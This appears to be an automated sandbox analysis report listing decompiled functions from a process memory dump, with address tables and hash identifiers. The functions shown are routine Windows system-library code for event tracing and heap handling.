                                                        0x048a108f
                                                        0x048a1093
                                                        0x048a10ab
                                                        0x048a10ab
                                                        0x048a10c3
                                                        0x048a10cf
                                                        0x048a10e1
                                                        0x048a10d1
                                                        0x048a10da
                                                        0x048a10da
                                                        0x048a10e9
                                                        0x048a10f5
                                                        0x048a10f5
                                                        0x048a10fe

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f2998b2b17025dcfdfcb50d2222841ee4da302b057cb98599caebc857cf37f6e
                                                        • Instruction ID: 022a1086a0cd0d8de64e5b425d54d8d638c8680b761364360df44ddd43f91938
                                                        • Opcode Fuzzy Hash: f2998b2b17025dcfdfcb50d2222841ee4da302b057cb98599caebc857cf37f6e
                                                        • Instruction Fuzzy Hash: 490128726047419FE710FF28C808B1A77D5AB84318F048F29F985D3690EEB4F850CB92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0488FEC0, Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E0488FEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x48cd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0481FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E047F7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0481B640(E04819AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                        0x0488fec0
                                                        0x0488fec0
                                                        0x0488fecf
                                                        0x0488fed9
                                                        0x0488fede
                                                        0x0488fee0
                                                        0x0488feeb
                                                        0x0488fef3
                                                        0x0488fef6
                                                        0x0488fef9
                                                        0x0488ff04
                                                        0x0488ff16
                                                        0x0488ff06
                                                        0x0488ff0f
                                                        0x0488ff0f
                                                        0x0488ff21
                                                        0x0488ff22
                                                        0x0488ff24
                                                        0x0488ff29
                                                        0x0488ff3e

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: dde22bba4b6eed1170d6d6f883dd292f9449447489f802e7c6635e053a97171b
                                                        • Instruction ID: 35ed1ed10632f76ad0ae022d35f5f90c2aa0391f37f28022572a42deb9980f97
                                                        • Opcode Fuzzy Hash: dde22bba4b6eed1170d6d6f883dd292f9449447489f802e7c6635e053a97171b
                                                        • Instruction Fuzzy Hash: 59018871E00208ABD714EB69D845FAEB7BCEF44714F404567FA00DB391EA74A941C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0488FE3F, Relevance: .0, Instructions: 46COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 59%
                                                        			E0488FE3F(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x48cd360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0481FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E047F7D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0481B640(E04819AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                        0x0488fe3f
                                                        0x0488fe3f
                                                        0x0488fe4e
                                                        0x0488fe58
                                                        0x0488fe5d
                                                        0x0488fe5f
                                                        0x0488fe6a
                                                        0x0488fe72
                                                        0x0488fe75
                                                        0x0488fe78
                                                        0x0488fe83
                                                        0x0488fe95
                                                        0x0488fe85
                                                        0x0488fe8e
                                                        0x0488fe8e
                                                        0x0488fea0
                                                        0x0488fea1
                                                        0x0488fea3
                                                        0x0488fea8
                                                        0x0488febd

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1ee867b902b4235448b0f83605d11622e022d24f4c00ec8f805a695208fe0b32
                                                        • Instruction ID: a377b7fa9175cb9ef2f2d449b7f988a98673d0c7c1ed1c8dc81c0bf8f8f05c9f
                                                        • Opcode Fuzzy Hash: 1ee867b902b4235448b0f83605d11622e022d24f4c00ec8f805a695208fe0b32
                                                        • Instruction Fuzzy Hash: B8018471E0020CABDB14EFA9D845FAEB7B8EF44714F00456BFA00EB391DA74A941C795
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A8ED6, Relevance: .0, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E048A8ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x48cd360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E047F7D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0481B640(E04819AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}


















                                                        0x048a8ed6
                                                        0x048a8ee5
                                                        0x048a8eed
                                                        0x048a8ef0
                                                        0x048a8efa
                                                        0x048a8f03
                                                        0x048a8f0c
                                                        0x048a8f15
                                                        0x048a8f24
                                                        0x048a8f27
                                                        0x048a8f31
                                                        0x048a8f43
                                                        0x048a8f33
                                                        0x048a8f3c
                                                        0x048a8f3c
                                                        0x048a8f4e
                                                        0x048a8f4f
                                                        0x048a8f51
                                                        0x048a8f56
                                                        0x048a8f69

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5921997cfa37989b384fbb8afa002d3622d1bd653eaac6fe2efd257418b4bac
                                                        • Instruction ID: c6c16a507fc6e148d3dd8af2abdf3d70270e9c978e4325781db6e2e8a905ef54
                                                        • Opcode Fuzzy Hash: e5921997cfa37989b384fbb8afa002d3622d1bd653eaac6fe2efd257418b4bac
                                                        • Instruction Fuzzy Hash: 23111E70E002099FDB04DFA8D441BAEF7F4FF08304F0446AAE918EB381E674A940CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A8A62, Relevance: .0, Instructions: 44COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 54%
                                                        			E048A8A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x48cd360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E047F7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0481B640(E04819AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}
















                                                        0x048a8a62
                                                        0x048a8a71
                                                        0x048a8a79
                                                        0x048a8a82
                                                        0x048a8a85
                                                        0x048a8a89
                                                        0x048a8a8c
                                                        0x048a8a8f
                                                        0x048a8a92
                                                        0x048a8a95
                                                        0x048a8a9f
                                                        0x048a8ab1
                                                        0x048a8aa1
                                                        0x048a8aaa
                                                        0x048a8aaa
                                                        0x048a8abc
                                                        0x048a8abd
                                                        0x048a8abf
                                                        0x048a8ac4
                                                        0x048a8ada

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 76fd6d63ac18ec16c2eb9005e6ebe7024e42ba91b14ca0f02380359b56ecd4a1
                                                        • Instruction ID: 4ac47284deeb6778a10711002f093e86ffb31f68f9efb12918b8090b207d10e8
                                                        • Opcode Fuzzy Hash: 76fd6d63ac18ec16c2eb9005e6ebe7024e42ba91b14ca0f02380359b56ecd4a1
                                                        • Instruction Fuzzy Hash: 76017CB1A0021CAFDB00EFA8D9459AEB7B8FF48310F10455AF904E7350E674BD00CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047DDB60, Relevance: .0, Instructions: 43COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047DDB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E047DDB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E047DE7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L047DE8B0(__ecx, _t14, 0xfff);
							L047F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}







                                                        0x047ddb64
                                                        0x047ddb66
                                                        0x047ddb6b
                                                        0x047ddbaa
                                                        0x047ddb71
                                                        0x047ddb76
                                                        0x047ddb7a
                                                        0x047ddba3
                                                        0x047ddb7c
                                                        0x047ddb87
                                                        0x047ddb8b
                                                        0x04834fa1
                                                        0x04834fb3
                                                        0x04834fb8
                                                        0x047ddb91
                                                        0x047ddb96
                                                        0x047ddb98
                                                        0x047ddb98
                                                        0x047ddb8b
                                                        0x047ddb7a
                                                        0x047ddb9d
                                                        0x047ddba2

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                        • Instruction ID: f1ea699fb53ff5206ba3b2e1c97639532727cc67d1c12322ea8a42a6ac88bb15
                                                        • Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
                                                        • Instruction Fuzzy Hash: DEF0FC332519229FE3735A558884F57B6BA8FC1A68F150035F1059B344C960BC0296E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047DB1E1, Relevance: .0, Instructions: 42COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047DB1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E047F7D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E047F7D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E04857016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}






                                                        0x047db1e8
                                                        0x047db1ea
                                                        0x047db1f3
                                                        0x04834a17
                                                        0x047db1f9
                                                        0x047db1f9
                                                        0x047db1f9
                                                        0x047db201
                                                        0x04834a21
                                                        0x04834a2e
                                                        0x00000000
                                                        0x00000000
                                                        0x04834a3b
                                                        0x04834a4d
                                                        0x04834a3d
                                                        0x04834a46
                                                        0x04834a46
                                                        0x04834a55
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047db20a
                                                        0x047db20a
                                                        0x047db20a
                                                        0x047db20a

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                        • Instruction ID: 98a4897816affb33d7957da723bf1ac05370932b69eb6c08c4725750e863675a
                                                        • Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
                                                        • Instruction Fuzzy Hash: CA01D1322006809BD3229B5DC908F697BA9EF41B54F0A44A2FA14DB7B1E679F840C255
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0486FE87, Relevance: .0, Instructions: 38COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 46%
                                                        			E0486FE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x48cd360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E047F7D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0481B640(E04819AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}
















                                                        0x0486fe96
                                                        0x0486fe9e
                                                        0x0486fea1
                                                        0x0486fead
                                                        0x0486feb3
                                                        0x0486feb9
                                                        0x0486fec3
                                                        0x0486fed5
                                                        0x0486fec5
                                                        0x0486fece
                                                        0x0486fece
                                                        0x0486fee0
                                                        0x0486fee1
                                                        0x0486fee3
                                                        0x0486fee8
                                                        0x0486fefb

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e11859966c0d4cac78dfad9a4df95b8317cab6cbb9d33339240f05a4b363dcd8
                                                        • Instruction ID: 0d75fc2a0f7fbadb0f073b901055d4dd5eae73a4342d8e2c5e3d8a6801471634
                                                        • Opcode Fuzzy Hash: e11859966c0d4cac78dfad9a4df95b8317cab6cbb9d33339240f05a4b363dcd8
                                                        • Instruction Fuzzy Hash: 2F014F70A00208AFCB14DFA8D545A6EBBF4EF08304F50456AA505DB392EA35E901CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0489131B, Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 48%
                                                        			E0489131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x48cd360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E047F7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0481B640(E04819AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                        0x0489131b
                                                        0x0489132a
                                                        0x04891330
                                                        0x04891336
                                                        0x0489133e
                                                        0x04891341
                                                        0x04891344
                                                        0x0489134f
                                                        0x04891361
                                                        0x04891351
                                                        0x0489135a
                                                        0x0489135a
                                                        0x0489136c
                                                        0x0489136d
                                                        0x0489136f
                                                        0x04891374
                                                        0x04891387

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 11082fa55c301741217471406b6e15eafc59588b368c08550be09a4775ede480
                                                        • Instruction ID: d69b903d0b8348b988aab5c2a843376aa150f9ebc950873434c93b2ccc1ca8e0
                                                        • Opcode Fuzzy Hash: 11082fa55c301741217471406b6e15eafc59588b368c08550be09a4775ede480
                                                        • Instruction Fuzzy Hash: FF018170A0020CAFDB04EFACD505AAEB7F4FF08300F40455AF845EB351E674AA00CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 048A8F6A, Relevance: .0, Instructions: 36COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 48%
                                                        			E048A8F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x48cd360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E047F7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0481B640(E04819AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                        0x048a8f6a
                                                        0x048a8f79
                                                        0x048a8f81
                                                        0x048a8f84
                                                        0x048a8f8b
                                                        0x048a8f91
                                                        0x048a8f94
                                                        0x048a8f9e
                                                        0x048a8fb0
                                                        0x048a8fa0
                                                        0x048a8fa9
                                                        0x048a8fa9
                                                        0x048a8fbb
                                                        0x048a8fbc
                                                        0x048a8fbe
                                                        0x048a8fc3
                                                        0x048a8fd6

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cf461043923db13200fc8b25fc7ad13b550ec7007eeb553608964ec64baa162d
                                                        • Instruction ID: add0312f58d400fa0da9df37658c60a6d75e4ee952f095a1bc8d732493119e65
                                                        • Opcode Fuzzy Hash: cf461043923db13200fc8b25fc7ad13b550ec7007eeb553608964ec64baa162d
                                                        • Instruction Fuzzy Hash: 37013174A0020DAFDB04EFA8D545AAEB7F4EF08304F50455AB905EB390EA74EA10CB95
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04891608, Relevance: .0, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 46%
                                                        			E04891608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x48cd360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E047F7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0481B640(E04819AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                        0x04891608
                                                        0x04891617
                                                        0x0489161d
                                                        0x04891625
                                                        0x04891628
                                                        0x0489162b
                                                        0x04891636
                                                        0x04891648
                                                        0x04891638
                                                        0x04891641
                                                        0x04891641
                                                        0x04891653
                                                        0x04891654
                                                        0x04891656
                                                        0x0489165b
                                                        0x0489166e

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f4538382d1b6c32eaa075b50dd73f8a27971c8af7a94a6de2eab251b767d721a
                                                        • Instruction ID: 4ad183ec8d977a2b2820c4ce52d3c66b6998ea3532ca4282800e1329246aee48
                                                        • Opcode Fuzzy Hash: f4538382d1b6c32eaa075b50dd73f8a27971c8af7a94a6de2eab251b767d721a
                                                        • Instruction Fuzzy Hash: 73F06271E04648EFDB04EFA8D445E6EB7F8EF18300F44456AE905EB391E674AD00CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 047FC577, Relevance: .0, Instructions: 33COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E047FC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E047FC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x47b11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E048A88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                        0x047fc577
                                                        0x047fc57d
                                                        0x047fc581
                                                        0x047fc5b5
                                                        0x047fc5b9
                                                        0x047fc5ce
                                                        0x047fc5ce
                                                        0x047fc5ca
                                                        0x00000000
                                                        0x047fc5ca
                                                        0x047fc5c4
                                                        0x047fc5c8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x047fc5ad
                                                        0x00000000
                                                        0x047fc5af

                                                        Memory Dump Source
                                                        • Source File: 0000000C.00000002.515725637.00000000047B0000.00000040.00000001.sdmp, Offset: 047B0000, based on PE: true
                                                        • Associated: 0000000C.00000002.516020668.00000000048CB000.00000040.00000001.sdmp Download File
                                                        • Associated: 0000000C.00000002.516057002.00000000048CF000.00000040.00000001.sdmp Download File
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0aed5ce694ee23afed271e6ab3f344112d8abfa33e7cfd67174bba3f7c3eb6ce
                                                        • Instruction ID: 7bed61a9f57a92208690530075816f65774688c8591f596298616df540ff2c2d
                                                        • Opcode Fuzzy Hash: 0aed5ce694ee23afed271e6ab3f344112d8abfa33e7cfd67174bba3f7c3eb6ce
                                                        • Instruction Fuzzy Hash: 4CF0B4B2D156AC9FE733DB6CC804B227BD4BB05774F744467D615A7302C6A4F880C261
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 04892073, Relevance: .0, Instructions: 32COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 94%
                                                        			E04892073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0488FD22(__ecx);
				_t19 =  *0x48c849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x48c8748; // 0x0
					if(__eflags <= 0) {
						E04891C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x48c8724 & 0x00000004;
							if(( *0x48c8724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x48c8724; // 0x0
					return E04888DF1(__ebx, 0xc0000374, 0x48c5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                        0x04892076
                                                        0x04892078
                                                        0x0489207d
                                                        0x04892083
                                                        0x048920a4
                                                        0x048920aa
                                                        0x048920ac
                                                        0x048920b7
                                                        0x048920ba
                                                        0x048920bc
                                                        0x048920c9
                                                        0x048920c9
                                                        0x048920d0
                                                        0x048920d2
                                                        0x00000000
                                                        0x048920d2
                                                        0x048920be
                                                        0x048920c3
                                                        0x048920c5
                                                        0x048920c7
                                                        0x00000000
                                                        0x00000000
                                                        0x048920c7
                                                        0x048920bc
